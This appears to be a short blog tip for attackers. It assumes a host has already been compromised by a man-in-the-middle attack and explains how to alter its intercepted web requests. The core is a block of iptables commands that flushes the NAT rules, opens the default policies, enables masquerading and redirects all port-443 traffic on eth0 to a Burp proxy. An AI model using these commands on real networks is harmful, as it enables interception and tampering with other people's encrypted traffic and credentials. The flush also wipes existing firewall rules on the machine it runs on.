So you’ve successfully MITM’ed a host on the network. Now you can do all sorts of stuff and intercept traffic and files and what-not, but how about not just intercepting it, but altering it? More precisely, let’s say you want to intercept and alter every request made to a website?
This can be done with some iptables magic and the Burp proxy.
On a linux box, execute the following:
iptables -F -t nat
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -A POSTROUTING -t nat -j MASQUERADE
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -i eth0 -p tcp –dport 443 -j DNAT –to 192.168.0.5:8080
This will make everything that is received on eth0 heading for port 443, pass through the proxy you have listening on port 8080 on the IP 192.168.0.5:8080
When you’re done, in my experience it’s easier to just clear the iptables and re-run you usual setup script, rather than extracting the lines you’ve just inputted.